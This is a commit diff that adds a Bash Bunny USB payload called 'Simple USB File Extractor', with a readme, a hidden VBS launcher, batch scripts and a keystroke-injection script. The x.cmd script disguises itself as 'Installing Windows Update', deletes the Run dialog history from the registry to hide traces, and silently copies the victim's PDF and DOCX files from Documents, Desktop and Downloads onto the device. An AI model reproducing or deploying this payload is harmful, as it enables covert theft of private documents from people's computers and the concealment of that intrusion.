Addition of Exfiltration payload (#300)

payloads/library/exfiltration/simple-usb-extractor/i.vbs

@@ -0,0 +1 @@
+CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

payloads/library/exfiltration/simple-usb-extractor/payload.txt

@@ -0,0 +1,6 @@
+# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs
+GET SWITCH_POSITION
+LED ATTACK
+ATTACKMODE HID STORAGE
+RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\z.cmd')"
+LED FINISH

payloads/library/exfiltration/simple-usb-extractor/readme.md

@@ -0,0 +1,32 @@
+# Simple USB File Extractor
+---
+- Author: DanTheGoodman
+- Creds: thehappydinoa, sebkinne
+(I snagged lots of lines from their code)
+
+### Description
+---
+A stupid easy to use file extractor leveraging the USB storage attack mode. Will stuff the found files in the `/loot/simple-usb-file-extractor` folder. Also deletes the run-line history because why not.
+
+
+
+### Dependencies
+---
+None :)
+
+
+
+### Configuration (optional)
+---
+By default the payload is set to pull all .pdf and .docx files from the Desktop, Downloads, and Documents folders. You can add new items/locations by making new xcopy lines in the x.cmd file.
+
+
+### Status:
+---
+|LED|Status|
+|---|---|
+|Yellow single blink|Running payload|
+|Solid Green|Files copied|
+
+---
+This is my first payload for the Bash Bunny, and I have finals right now, and I am doing this instead of studying so it's not fancy but I wanted to make something.

payloads/library/exfiltration/simple-usb-extractor/x.cmd

@@ -0,0 +1,37 @@
+@echo off
+@echo Installing Windows Update
+
+REM Delete registry keys storing Run dialog history
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+REM Set the location
+set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+mkdir %dst% >>nul
+
+if Exist %USERPROFILE%\Documents (
+REM /C Continues copying even if errors occur.
+REM /Q Does not display file names while copying.
+REM /G Allows the copying of encrypted files to destination that does not support encryption.
+REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
+REM /E Copies directories and subdirectories, including empty ones.
+
+REM Add more of the line below specifying the location and file type
+REM The below example grabs all .pdf files from the user's documents folder
+REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
+
+xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.pdf %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.docx %dst% >>nul
+)
+
+if Exist %USERPROFILE%\Desktop (
+xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.pdf %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.docx %dst% >>nul
+)
+
+if Exist %USERPROFILE%\Downloads (
+xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.pdf %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.docx %dst% >>nul
+)
+
+@cls
+@exit

payloads/library/exfiltration/simple-usb-extractor/z.cmd

@@ -0,0 +1,3 @@
+@echo off
+cscript %~dp0\i.vbs %~dp0\x.cmd
+@exit